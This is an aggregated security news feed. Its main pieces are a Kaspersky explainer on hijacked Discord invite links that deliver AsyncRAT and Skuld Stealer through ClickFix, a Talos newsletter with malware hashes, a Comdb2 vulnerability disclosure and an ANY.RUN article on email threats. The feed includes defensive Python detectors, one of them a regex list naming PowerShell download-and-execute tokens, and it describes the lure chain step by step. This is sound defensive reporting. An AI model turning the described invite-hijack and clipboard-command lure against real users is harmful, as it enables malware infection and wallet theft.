SharePoint under fire: ToolShell attacks hit organizations worldwide

The ToolShell bugs are being exploited by cybercriminals and APT groups alike, with the US on the receiving end of 13 percent of all attacks

WeLiveSecurity – Read More

Attackers are using expired and deleted Discord invite links to distribute two strains of malware: AsyncRAT for taking remote control of infected computers, and Skuld Stealer for stealing crypto wallet data. They do this by exploiting a vulnerability in Discord’s invite link system to stealthily redirect users from trusted sources to malicious servers.

The attack leverages the ClickFix technique, multi-stage loaders and deferred execution to bypass defenses and deliver malware undetected. This post examines in detail how attackers exploit the invite link system, what ClickFix is and why they use it, and, most importantly, how not to fall victim to this scheme.

First, let’s look at how Discord invite links work and how they differ from each other. This will give us insight into how the attackers learned to exploit Discord’s link creation system.

Discord invite links are special URLs that users can use to join servers. They are created by administrators to simplify access to communities without having to add members manually. Invite links in Discord can take two alternative formats: https://discord.gg/{invite_code} and https://discord.com/invite/{invite_code}.

Having more than one format, with one that uses a “meme” domain, is not the best solution from a security viewpoint, because it confuses users. But that’s not all. Discord invite links also come in three main types (temporary, permanent and custom), which differ significantly in their properties.

Temporary invite links are what Discord creates by default. In the Discord app, the server administrator can choose from fixed invite expiration times: 30 minutes, 1 hour, 6 hours, 12 hours, 1 day or 7 days (the default option). For links created through the Discord API, a custom expiration time can be set: any value up to 7 days.

Codes for temporary invite links are randomly generated and usually contain 7 or 8 characters, including uppercase and lowercase letters, as well as numbers. Examples of a temporary link:

To create a permanent invite link, the server administrator must manually select Never in the Expire After field. Permanent invite codes consist of 10 random characters — uppercase and lowercase letters, and numbers, as before. Example of a permanent link:

Lastly, custom invite links (vanity links) are available only to Discord Level 3 servers. To reach this level, a server must get 14 boosts, which are paid upgrades that community members can buy to unlock special perks. That’s why popular communities with an active audience — servers of bloggers, streamers, gaming clans or public projects — usually attain Level 3.

Custom invite links allow administrators to set their own invite code, which must be unique among all servers. The code can contain lowercase letters, numbers and hyphens, and can be almost arbitrary in length — from 2 to 32 characters. A server can have only one custom link at any given time.
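The code formats described above can be summarized as a rough classifier. This is a minimal sketch that assumes only the length and character-set rules stated in this post; Discord does not publish such a function, and the name `classify_invite_code` is hypothetical. Because the categories overlap (a short all-lowercase code fits both the temporary and the vanity pattern), it returns every type a code could belong to rather than a single verdict.

```python
import re
from typing import List

# Patterns derived from the rules described in this post (assumption: no other formats exist).
TEMPORARY = re.compile(r"[A-Za-z0-9]{7,8}")  # random, 7-8 mixed-case letters and digits
PERMANENT = re.compile(r"[A-Za-z0-9]{10}")   # random, 10 mixed-case letters and digits
VANITY = re.compile(r"[a-z0-9-]{2,32}")      # custom: lowercase letters, digits, hyphens, 2-32 chars


def classify_invite_code(code: str) -> List[str]:
    """Return every invite type whose format the code matches (hypothetical helper)."""
    kinds = []
    if TEMPORARY.fullmatch(code):
        kinds.append("temporary")
    if PERMANENT.fullmatch(code):
        kinds.append("permanent")
    if VANITY.fullmatch(code):
        kinds.append("vanity")
    return kinds


for sample in ["aB3dE9k", "Xy7Kp2Qm9Z", "my-gaming-clan", "abc1234"]:
    print(sample, classify_invite_code(sample))
```

The last sample matches two patterns at once, which illustrates why the format of a code alone does not tell a user what kind of invite they are looking at.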

Such links are always permanent — they do not expire as long as the server maintains Level 3 perks. If the server loses this level, its vanity link becomes available for reuse by another server with the required level. Examples of a custom invite link:

From this last example, attentive readers may guess where we’re heading.

Now that we’ve looked at the different types of Discord invite links, let’s see how malicious actors weaponize the mechanism. Note that when a regular, non-custom invite link expires or is deleted, the administrator of a legitimate server cannot get the same code again, since all codes are generated randomly.

But when creating a custom invite link, the server owner can manually enter any available code, including one that matches the code of a previously expired or deleted link.

It is this quirk of the invite system that attackers exploit: they track legitimate expiring codes, then register them as custom links on their servers with Level 3 perks.
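The asymmetry can be illustrated with a toy model of the invite namespace. This is a hypothetical simulation, not Discord’s implementation: the class `InviteRegistry`, its methods and the Level 3 check are assumptions made for illustration, and the vanity character rules are deliberately not enforced. The point it shows is that a random code can never be chosen again by its original owner, but once it is released, anyone with vanity rights can claim it by name.

```python
import secrets
import string
from typing import Dict, Optional

ALPHABET = string.ascii_letters + string.digits


class InviteRegistry:
    """Toy model of a single global namespace mapping invite codes to servers (hypothetical)."""

    def __init__(self) -> None:
        self.active: Dict[str, str] = {}

    def create_random(self, server: str, length: int = 8) -> str:
        # Regular invite: the platform picks a random unused code; the owner cannot choose it.
        while True:
            code = "".join(secrets.choice(ALPHABET) for _ in range(length))
            if code not in self.active:
                self.active[code] = server
                return code

    def expire(self, code: str) -> None:
        # Expiry or deletion simply frees the code; nothing remembers who used it before.
        self.active.pop(code, None)

    def claim_vanity(self, server: str, code: str, level: int) -> bool:
        # Vanity invite: a Level 3 server may pick any code that is currently free.
        # (Simplification: the lowercase/length rules for vanity codes are not enforced.)
        if level < 3 or code in self.active:
            return False
        self.active[code] = server
        return True

    def resolve(self, code: str) -> Optional[str]:
        # Where a visitor following an old link would land.
        return self.active.get(code)


registry = InviteRegistry()
old_code = registry.create_random("legit-community")  # posted on a forum long ago
registry.expire(old_code)                              # link expires; the forum post stays
registry.claim_vanity("attacker-server", old_code, level=3)
print(registry.resolve(old_code))                      # the old forum link now resolves here
```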

As a result, scammers can use:

What does this substitution lead to? Attackers get the ability to direct users who follow links previously posted on wholly legitimate resources (social networks, websites, blogs and forums of various communities) to their own malicious servers on Discord.

What’s more, the legitimate owners of these resources may not even realize that the old invite links now point to fake Discord servers set up to distribute malware. This means they can’t even warn users that a link is dangerous, or delete messages in which it appears.



Now let’s talk about what happens to users who follow hijacked invite links received from trusted sources. After joining the attackers’ Discord server, the user sees that all channels are unavailable to them except one, called verify.

On the attackers’ Discord server, users who followed the hijacked link have access to only one channel, verify.



This channel features a bot named Safeguard that offers full access to the server. To get this, the user must click the Verify button, which is followed by a prompt to authorize the bot.

On clicking the Authorize button, the user is automatically redirected to the attackers’ external site, where the next and most important phase of the attack begins.



After authorization, the bot gains access to profile information (username, avatar, banner), and the user is redirected to an external site: https://captchaguard[.]me. Next, the user goes through a chain of redirects and ends up on a well-designed web page that mimics the Discord interface, with a Verify button in the center.

Redirection takes the user to a fake page styled to look like the Discord interface. Clicking the Verify button activates malicious JavaScript code that copies a PowerShell command to the clipboard.



Clicking the Verify button activates JavaScript code that copies a malicious PowerShell command to the clipboard. The user is then given precise instructions on how to “pass the check”: open the Run window (Win + R), paste the copied text (Ctrl + V), and press Enter.

Next comes the ClickFix technique: the user is instructed to paste and run the malicious command copied to the clipboard in the previous step.

The site does not ask the user to download or run any files manually, thereby removing the typical warning signs. Instead, users essentially infect themselves by running a malicious PowerShell command that the site slips onto the clipboard. All these steps are part of an infection tactic called ClickFix, which we’ve already covered in depth on our blog.
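Because the lure depends on the victim pasting text into the Run dialog, one defensive idea is to inspect text about to be executed (for example, clipboard contents, or commands recovered from the RunMRU registry key where Windows remembers Run-dialog entries) for the hallmarks of a download-and-execute one-liner. The sketch below is a hypothetical heuristic, not a product feature: the indicator list is an assumption based on common PowerShell download cradles, since the actual command used in this campaign is not reproduced here, and the threshold is arbitrary.

```python
import re

# Hypothetical indicators of a pasted PowerShell download cradle (assumed, not exhaustive).
INDICATORS = [
    r"\bpowershell(\.exe)?\b",
    r"-w(indowstyle)?\s+hidden",
    r"\b(iex|invoke-expression)\b",
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b",
    r"downloadstring",
    r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    r"https?://",
]


def clickfix_score(text: str) -> int:
    """Count how many indicator patterns appear in the lowercased text."""
    lowered = text.lower()
    return sum(1 for pattern in INDICATORS if re.search(pattern, lowered))


def looks_like_clickfix(text: str, threshold: int = 3) -> bool:
    """Flag text that matches several indicators at once (threshold is an assumption)."""
    return clickfix_score(text) >= threshold
```

Requiring several indicators at once, rather than any single keyword, is a design choice meant to avoid flagging ordinary text that merely contains a URL.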

The user-activated PowerShell script is the first step in the multi-stage delivery of the malicious payload. The attackers’ next goal is to install two malicious programs on the victim’s device — let’s take a closer look at each of them.

First, the attackers download a modified version of AsyncRAT to gain remote control over the infected system. This tool provides a wide range of capabilities: executing commands and scripts, intercepting keystrokes, viewing the screen, managing files, and accessing the remote desktop and camera.

Next, the cybercriminals install Skuld Stealer on the victim’s device. This crypto stealer harvests system information, siphons off Discord login credentials and authentication tokens saved in the browser, and, crucially, steals seed phrases and passwords for Exodus and Atomic crypto wallets by injecting malicious code directly into their interface.

Skuld sends all collected data via a Discord webhook, a one-way HTTP channel that lets applications post messages to Discord channels automatically. This gives the attackers a simple way to exfiltrate stolen information straight into Discord without building sophisticated command-and-control infrastructure.
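Discord webhooks are addressed by URLs of the form https://discord.com/api/webhooks/&lt;id&gt;/&lt;token&gt; (the older discordapp.com domain and canary/ptb subdomains also appear in the wild), so outbound requests to such URLs are worth reviewing in proxy logs. The sketch below assumes plain-text log lines in a hypothetical format and a hypothetical helper name; legitimate software also uses webhooks, so hits need triage rather than automatic blocking. It returns only the webhook ID, never the token, so results can be shared safely.

```python
import re
from typing import Iterable, Iterator, Tuple

# https://discord.com/api/webhooks/<id>/<token>, plus legacy/alternate hosts and versioned paths.
WEBHOOK_RE = re.compile(
    r"https?://(?:(?:canary|ptb)\.)?discord(?:app)?\.com/api(?:/v\d+)?/webhooks/(\d+)/([\w-]+)",
    re.IGNORECASE,
)


def find_webhook_calls(lines: Iterable[str]) -> Iterator[Tuple[int, str]]:
    """Yield (line_number, webhook_id) for each Discord webhook URL found in the log lines.

    The token (group 2) is deliberately dropped: whoever holds it can post to the webhook.
    """
    for number, line in enumerate(lines, start=1):
        for match in WEBHOOK_RE.finditer(line):
            yield number, match.group(1)


logs = [
    "2025-07-20T10:01:02 GET https://example.com/index.html",
    "2025-07-20T10:01:05 POST https://discord.com/api/webhooks/123456789012345678/AbC-dEf_123",
]
for line_no, webhook_id in find_webhook_calls(logs):
    print(f"line {line_no}: Discord webhook {webhook_id}")
```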

As a result, all data — from passwords and authentication tokens to crypto wallet seed phrases — is automatically published in a private channel set up in advance on the attackers’ Discord server. Armed with the seed phrases, the attackers can recover all the private keys of the hijacked wallets and gain full control over all cryptocurrency assets of their victims.
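Why a seed phrase is enough: in wallets that follow the BIP39 standard (an assumption here, since this post does not say which derivation scheme Exodus or Atomic use), the mnemonic is stretched into a 512-bit master seed with PBKDF2-HMAC-SHA512, 2048 iterations and the salt "mnemonic" plus an optional passphrase, after Unicode NFKD normalization. All private keys are then derived deterministically from that seed, so anyone holding the words regenerates the same keys. The sketch shows only the first step, using Python’s standard library and the public all-"abandon" test mnemonic.

```python
import hashlib
import unicodedata


def bip39_seed(mnemonic: str, passphrase: str = "") -> bytes:
    """Derive the 64-byte BIP39 seed from a mnemonic and an optional passphrase."""
    # BIP39 normalizes both strings to Unicode NFKD before hashing.
    words = unicodedata.normalize("NFKD", mnemonic)
    salt = unicodedata.normalize("NFKD", "mnemonic" + passphrase)
    # dklen defaults to the SHA-512 digest size, i.e. 64 bytes.
    return hashlib.pbkdf2_hmac("sha512", words.encode("utf-8"), salt.encode("utf-8"), 2048)


# Public test mnemonic from the BIP39 test vectors; never use it for real funds.
TEST_MNEMONIC = " ".join(["abandon"] * 11 + ["about"])
seed = bip39_seed(TEST_MNEMONIC, "TREZOR")
print(seed.hex())
```

The derivation is deterministic, which is exactly what makes a stolen seed phrase so damaging: the thief does not need the victim’s device, only the words.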

Unfortunately, Discord’s invite system lacks transparency, which makes it extremely difficult, especially for newcomers, to spot the trick before clicking a hijacked link or during the redirection process.

Nevertheless, there are some security measures that, if followed properly, should fend off the worst outcome (a malware-infected computer and financial losses):

Malicious actors often target Discord to steal cryptocurrency, game accounts and assets, and generally cause misery for users. Check out our posts for more examples of Discord scams:

Kaspersky official blog – Read More

Welcome to this week’s edition of the Threat Source newsletter.

Yesterday, Cisco Talos debuted the first Humans of Talos episode, where I interviewed Hazel Burton, a face and voice you’re probably familiar with. In our conversation, Hazel shared not just the story of how she found her way onto the team, but also the passions and hobbies that energize her work. Plus, she offered a sneak peek into what she’s most looking forward to at Black Hat this year! With future Humans of Talos episodes, you’ll get to learn not only about the people behind the research, but the people behind the communications, operations, and design, too.

My team chose to name the series “Humans of Talos” as a cheeky wink to the world of machine learning (ML) and a reminder that no matter how sophisticated our technology gets, it’s always our humanity that makes the difference.

I’m a sci-fi nerd who loves a captive audience, so let’s consider Murderbot from Martha Wells’ “The Murderbot Diaries” (now a TV show starring Alexander Skarsgård). Designed as a security unit with both organic and mechanical parts, self-named Murderbot secretly hacks its own governor module and, instead of turning on humans, spends its free time watching soap operas like “The Rise and Fall of Sanctuary Moon.” So relatable, right? What draws readers in isn’t its technical specs. It’s Murderbot’s dry humor, awkwardness, struggle with newfound autonomy, and the way it wrestles with what it means to care for others (even if it pretends not to). Despite its past, when it was treated as a piece of equipment rather than a living thing, Murderbot is both highly analytical and empathetic. Advanced technology is most powerful when paired with genuine human creativity and insight, and this is a balance we seek every day at Talos.

If cozy, found family sci-fi is more your vibe, take Lovey (aka Sidra) from Becky Chambers’ “The Long Way to a Small, Angry Planet” and “A Closed and Common Orbit.” Originally an AI managing a tunneling spaceship, Lovey is suddenly transferred into a human-like body kit and faces the challenge of living in a world she was never designed for, which is where her story really gets interesting. She has to learn everything from how to move and act to how to build friendships and find her own purpose. Learning to ask for help, make mistakes and trust the people around us is familiar to many of us in the cybersecurity community. No matter how advanced our tools become, it’s our willingness to learn from each other, collaborate and grow together that truly makes us stronger and better at our work.

So while Talos has practically always used ML in our work, I’ll always say that it is nothing without the humans behind it. We all share one mission: protecting our customers.

Tune into the next episode mid-August, and whether you’re streaming “Sanctuary Moon” or finding your place in the universe like Lovey, stay safe and secure out there!

Cisco Talos Incident Response (Talos IR) has identified a new ransomware-as-a-service (RaaS) group called Chaos, which is actively targeting organizations worldwide with sophisticated attacks involving phishing, remote management tool abuse, and double extortion tactics.

We assess with moderate confidence that Chaos was likely formed by former members of the BlackSuit (Royal) gang. They use advanced encryption, anti-analysis techniques, and target both local and networked systems for maximum disruption. We believe the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, and the group uses the same name to create confusion.

Chaos is going after organizations of all sizes across verticals using techniques that can bypass common security measures, steal sensitive data and disrupt business operations. Even if you’re not a direct target, your company could be affected if you work with a business that is attacked, or if similar tactics are used against your sector.

Review your organization’s security posture, especially around email, remote access and backup systems. Make sure you’re using multi-factor authentication, keeping software up-to-date and educating employees about phishing and social engineering.

Microsoft rushes emergency patch for actively exploited SharePoint “ToolShell” bug

Malicious actors have already pounced on the zero-day vulnerability in Microsoft SharePoint Server, tracked as CVE-2025-53770, to compromise US government agencies and other businesses in ongoing and widespread attacks. (DarkReading) (Cisco Talos)

Europol sting leaves Russian cybercrime’s “NoName057(16)” group fractured

National authorities have issued seven arrest warrants in total relating to the cybercrime collective known as NoName057(16), which recruits followers to carry out DDoS attacks on perceived enemies of Russia. (DarkReading)

Indian crypto exchange CoinDCX confirms $44M stolen during hack

On Saturday, CoinDCX co-founder and CEO Sumit Gupta disclosed in a post on X that an internal account was compromised during the hack. The executive assured that the incident did not affect customer funds and that all its customer assets remain secure. (TechCrunch)

Ryuk ransomware operator extradited to US, faces five years in federal prison

Justice Department officials said the operators received about 1,160 bitcoins — valued at more than $15 million at the time — in ransom payments from victim companies. (CyberScoop)

We have lots of videos to share, so queue them up and let’s get learning!

SnortML in 60 seconds

Most detection engines rely on signatures, but when threats evolve or the exploit is brand new, these rules can fall short. Enter SnortML!

Humans of Talos: Hazel Burton

Okay, I know I hammered this into you in the intro, but Hazel is a delight to listen to, and she gives a lot of wonderful insights. Watch here.

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: IMG001.exe

Detection Name: Simple_Custom_Detection

SHA 256: ee33aaa05be135969d86452a49a8e50a5313efdfc46ae2e7fc8a9af33556046c

MD5: 17e33efb1b100397c3a9908df7032da1

VirusTotal: https://www.virustotal.com/gui/file/ee33aaa05be135969d86452a49a8e50a5313efdfc46ae2e7fc8a9af33556046c/details

Typical Filename: tacticalrmm.exe

Claimed Product: N/A

Detection Name: W32.EE33AAA05B-95.SBX.TG

SHA 256: 0581bd9f0e1a6979eb2b0e2fd93ed6c034036dadaee863ff2e46c168813fe442

MD5: 7854b00a94921b108f0aed00f77c7833

VirusTotal: https://www.virustotal.com/gui/file/0581bd9f0e1a6979eb2b0e2fd93ed6c034036dadaee863ff2e46c168813fe442/details

Typical Filename: winword.exe

Claimed Product: Microsoft Word, Excel, Outlook, Visio, OneNote

Detection Name: W32.0581BD9F0E.in12.Talos

SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa

MD5: df11b3105df8d7c70e7b501e210e3cc3

VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details

Typical Filename: DOC001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08

MD5: 906282640ae3088481d19561c55025e4

VirusTotal: https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08/details

Typical Filename: AAct_x64.exe

Claimed Product: N/A

Detection Name: PUA.Win.Tool.Winactivator::1201

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0

MD5: 8c69830a50fb85d8a794fa46643493b2

VirusTotal: https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details

Typical Filename: AAct.exe

Claimed Product: N/A

Detection Name: PUA.Win.Dropper.Generic::1201
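To check local files against the hashes listed above, a short script can compute each file’s SHA-256 and look it up. This is a minimal sketch using Python’s hashlib; the table copies the SHA-256 values and detection names from this list, and the function names are hypothetical. A match is strong evidence, but a miss proves nothing, since changing a single byte of a sample produces a completely different hash.

```python
import hashlib
from pathlib import Path
from typing import Optional

# SHA-256 -> detection name, copied from the list above.
IOC_SHA256 = {
    "9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507": "Win.Worm.Coinminer::1201",
    "a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91": "Simple_Custom_Detection",
    "ee33aaa05be135969d86452a49a8e50a5313efdfc46ae2e7fc8a9af33556046c": "W32.EE33AAA05B-95.SBX.TG",
    "0581bd9f0e1a6979eb2b0e2fd93ed6c034036dadaee863ff2e46c168813fe442": "W32.0581BD9F0E.in12.Talos",
    "59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa": "Win.Worm.Coinminer::1201",
    "83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08": "PUA.Win.Tool.Winactivator::1201",
    "c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0": "PUA.Win.Dropper.Generic::1201",
}


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_ioc(path: Path) -> Optional[str]:
    """Return the detection name if the file's SHA-256 is in the IOC table, else None."""
    return IOC_SHA256.get(sha256_of(path))


def scan(root: Path) -> None:
    """Print every file under root whose hash matches a listed IOC."""
    for path in root.rglob("*"):
        if path.is_file():
            hit = match_ioc(path)
            if hit:
                print(f"{path}: {hit}")
```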

Cisco Talos Blog – Read More

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Bloomberg Comdb2.

Comdb2 is an open source, high-availability database developed by Bloomberg. It supports features such as clustering, transactions, snapshots, and isolation. The implementation of the database utilizes optimistic locking for concurrent operation.
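In general terms, optimistic locking means transactions do not hold locks while they read and modify data; instead, each one checks at commit time whether the data it relied on has changed in the meantime, and retries or aborts if it has. The sketch below is a generic illustration of that idea using per-row version numbers. It is not how Comdb2 implements its concurrency control, and the class and function names are hypothetical.

```python
import threading
from typing import Dict, Tuple


class ConflictError(Exception):
    """Raised when a row changed between the read and the commit."""


class VersionedStore:
    def __init__(self) -> None:
        self._rows: Dict[str, Tuple[int, object]] = {}  # key -> (version, value)
        self._commit_lock = threading.Lock()  # guards only the short validate-and-write step

    def read(self, key: str) -> Tuple[int, object]:
        # Reads take no lock; they just record the version they saw.
        return self._rows.get(key, (0, None))

    def commit(self, key: str, read_version: int, new_value: object) -> int:
        with self._commit_lock:
            current_version, _ = self._rows.get(key, (0, None))
            # Validate: fail if another writer committed after our read.
            if current_version != read_version:
                raise ConflictError(f"{key}: expected v{read_version}, found v{current_version}")
            self._rows[key] = (current_version + 1, new_value)
            return current_version + 1


def increment(store: VersionedStore, key: str, retries: int = 5) -> int:
    """Read-modify-write that retries on conflict instead of blocking other readers."""
    for _ in range(retries):
        version, value = store.read(key)
        new_value = (value or 0) + 1
        try:
            store.commit(key, version, new_value)
            return new_value
        except ConflictError:
            continue  # someone else won the race; re-read and try again
    raise ConflictError(f"{key}: gave up after {retries} attempts")
```

The trade-off is that readers never wait, at the cost of wasted work when two writers collide on the same row.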

The vulnerabilities mentioned in this blog post have been patched by the vendor, all in adherence to Cisco’s third-party vulnerability disclosure policy.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Discovered by a member of Cisco Talos.

Three null pointer dereference vulnerabilities exist in Bloomberg Comdb2 8.1. Two of them (TALOS-2025-2197 (CVE-2025-36520) and TALOS-2025-2201 (CVE-2025-35966)) are in protocol buffer message handling and can lead to denial of service. An attacker can simply connect to a database instance over TCP and send a crafted message to trigger either vulnerability. The third, TALOS-2025-2199 (CVE-2025-48498), is in the distributed transaction component: a specially crafted network packet sent by an attacker can lead to a denial of service.

There are also two denial-of-service vulnerabilities:

Even with all the new ways we stay in touch (Slack, Teams, DMs), email is still the backbone of business communication. That also makes it one of the easiest ways in for attackers.

A single message with the right subject line or attachment can lead to stolen logins, malware infections, or even full network access. It happens so fast that many employees don’t notice until it’s too late.

Let’s take a closer look at the most common security risks businesses face when it comes to email, and what you can do to avoid falling into those traps.

For security teams, email is often the most unpredictable part of the attack surface. Firewalls, EDR, and filters help, but one convincing message can still get through.

Here are a few reasons why email remains a top security concern:

To reduce risk, businesses need visibility into what’s happening behind the scenes: what gets triggered, what connects where, and what the real intent is.

Sandboxes like ANY.RUN make that possible. They let security teams safely detonate suspicious emails and watch every step of the attack before it reaches users or spreads across the network.

The following real-world cases, captured inside ANY.RUN’s sandbox, show how today’s most common email threats actually unfold. From malware-laced attachments to zero-click exploits, these examples reveal the tactics that put businesses at risk every day.

Malware-laced attachments remain one of the most effective ways for attackers to break into corporate systems. According to Verizon’s 2024 Data Breach Investigations Report, more than 50% of successful email-based attacks involved malicious attachments, often disguised as invoices, contracts, or shipping documents. All it takes is one click from a distracted employee.

These files can open the door to data theft, ransomware, and full system compromise.

Here’s a real-world example that shows exactly how this happens, captured in an ANY.RUN sandbox session where the entire attack chain unfolds in front of you.



Real Case: A Dangerous PDF That Looks Legit



In this analysis, the file is named Rauscher-Fahrzeugeinrichtungen.pdf, harmless enough at first glance. But once opened, it immediately starts reaching out to a phishing page hosted on SharePoint. That’s your first red flag.

Why SharePoint? Because it’s a legitimate Microsoft domain, often trusted by corporate environments. Hosting a phishing link there increases the chance of bypassing security filters and convincing the user to trust it.



ANY.RUN flags this right away. In the Threats panel, we see it’s marked as “Social Engineering Attempted” and tied to MITRE Technique T1566 (Phishing).



Digging deeper, the PDF contains obfuscated JavaScript, a common trick used to hide malicious code from basic scanners. The user doesn’t see anything unusual, but Adobe Acrobat and Microsoft Edge are triggered, opening a fake Microsoft login page. These processes attempt to communicate with external servers and interact with the system in suspicious ways.
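A crude first-pass check for this trick is to count PDF name objects that commonly signal active content, such as /JavaScript, /JS, /OpenAction and /AA. The sketch below is a hypothetical triage helper, not ANY.RUN’s detection logic, and the watch list is an assumption. It scans raw bytes, so it will miss keywords hidden inside compressed object streams or written with hex-escaped names, which is exactly why dynamic analysis in a sandbox is still needed.

```python
import re
from typing import Dict

# PDF name objects that often indicate active or auto-run content (assumed watch list).
SUSPICIOUS_NAMES = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/URI"]


def pdf_keyword_counts(data: bytes) -> Dict[str, int]:
    """Count suspicious name objects in raw PDF bytes.

    The negative lookahead requires the name to end there, so "/JS" is not counted inside "/JSON".
    """
    counts = {}
    for name in SUSPICIOUS_NAMES:
        pattern = re.escape(name.encode("ascii")) + rb"(?![A-Za-z0-9#])"
        counts[name] = len(re.findall(pattern, data))
    return counts


def looks_active(data: bytes) -> bool:
    """True if the raw bytes visibly reference embedded JavaScript."""
    counts = pdf_keyword_counts(data)
    return counts["/JavaScript"] + counts["/JS"] > 0


sample = (
    b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj"
)
print(pdf_keyword_counts(sample))
```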

The goal of the attack here is to steal credentials using social engineering and invisible redirections. Everything about this PDF is designed to trick both the user and the security software.

Without a sandbox, this kind of attack is easy to miss. The file looks like a regular PDF, the hosting domain is trusted, and the user doesn’t see anything unusual until it’s too late.

But with ANY.RUN:

Login credentials are gold for attackers. With the right email and a well-placed link, they can trick employees into handing over usernames and passwords, sometimes without even realizing it.

In fact, spearphishing links (MITRE T1566.002) remain one of the most popular ways to steal credentials, especially those tied to business accounts like Microsoft 365 or Gmail.

Here’s one case from the ANY.RUN sandbox that shows exactly how fast it can happen.





Real Case: Phishing with Tycoon 2FA

This phishing campaign used a platform called Tycoon 2FA, a tool designed to bypass multi-factor authentication on Microsoft and Google accounts. It all starts with a single malicious link sent via email.

Once the victim clicks the link, the system opens it in the browser, but that’s just the beginning. In the sandbox, we can see multiple Microsoft Edge processes launch one after another, which is already suspicious.

Then things get weirder. The sandbox also shows that these processes are modifying browser cache and user data folders, which normally wouldn’t happen during casual browsing.

The system also starts making changes in the registry, a place Windows uses to store settings. This often points to deeper system manipulation.

Eventually, the victim is redirected to a fake Microsoft login page. It looks completely legitimate, but it’s hosted on a malicious domain. If the victim enters their credentials here, the attacker gets immediate access.

The sandbox also catches a possible connection to the Tor network, which attackers often use to hide where the stolen data is being sent.

Phishing links like this don’t leave much of a trace, but a sandbox catches what users and filters miss. With ANY.RUN, you see how the attack really works, so you can block it smarter, faster, and for good.





Some attacks don’t rely on tricking users; they rely on software flaws that no one even knows about yet. These are zero-day exploits, and they’re dangerous because there’s no fix when they first appear.

One of the most recent examples is CVE-2024-43451, a Windows vulnerability that leaks a user’s NTLMv2 hash, a sensitive authentication value. All it takes is minimal interaction with a specially crafted shortcut file: just hovering over, renaming, or deleting it can silently trigger a connection to a remote server controlled by the attacker.

Once captured, the hash can be cracked offline to recover the password or relayed to other services in an NTLM relay attack, letting intruders impersonate the user and move through the network.

Real Case: Phishing with Zero Interaction

In this sandbox session, attackers exploit the CVE-2024-43451 vulnerability to launch a malicious HTML file from an .eml email attachment. The user doesn’t need to click a link or run anything manually; just opening the email is enough to trigger the chain.

Microsoft Edge launches instantly and redirects the user to a phishing site without any additional interaction. This is a textbook example of a zero-interaction phishing attack, where the victim is compromised simply by viewing the message.

Inside the sandbox, we also see that the malicious file triggers WinRAR.exe, which in turn executes hidden commands tied to the CVE-2024-43451 vulnerability.



But that’s not all. The exploit leads to a silent SMB connection, a network communication that sends the victim’s NTLMv2 hash to an external server. The hash can later be cracked or relayed, letting intruders move through a network as if they were the victim.
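Because the hash leaves the network over SMB, a cheap compensating control is to alert on, and ideally block at the perimeter, outbound TCP 445 connections to public addresses. The sketch below assumes connection records have already been parsed into (source, destination, port) tuples, a hypothetical format, and uses Python’s `ipaddress` module to separate internal from public destinations. It covers only SMB on port 445.

```python
import ipaddress
from typing import Iterable, List, Tuple

Connection = Tuple[str, str, int]  # (source_ip, destination_ip, destination_port)


def external_smb(connections: Iterable[Connection]) -> List[Connection]:
    """Return SMB connections (TCP 445) whose destination is a publicly routable address."""
    flagged = []
    for src, dst, port in connections:
        if port != 445:
            continue
        # is_global is False for private, loopback, link-local and documentation ranges.
        if ipaddress.ip_address(dst).is_global:
            flagged.append((src, dst, port))
    return flagged


records = [
    ("10.0.0.5", "10.0.0.9", 445),  # internal file share: expected
    ("10.0.0.5", "8.8.8.8", 445),   # SMB to the internet: suspicious
    ("10.0.0.5", "8.8.8.8", 443),   # HTTPS: out of scope for this check
]
print(external_smb(records))
```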

This kind of attack is especially dangerous because it doesn’t rely on clicks or user mistakes. It looks like a normal email but behind the scenes, it opens the door to credential theft and internal access.

With ANY.RUN, the entire chain was exposed in under one minute. That kind of speed gives your security team a real advantage, cutting detection time, reducing investigation effort, and preventing costly breaches before they unfold.



QR codes have become part of everyday life: menus, logins, verifications. And attackers know it. That’s what makes quishing (QR phishing) so effective.

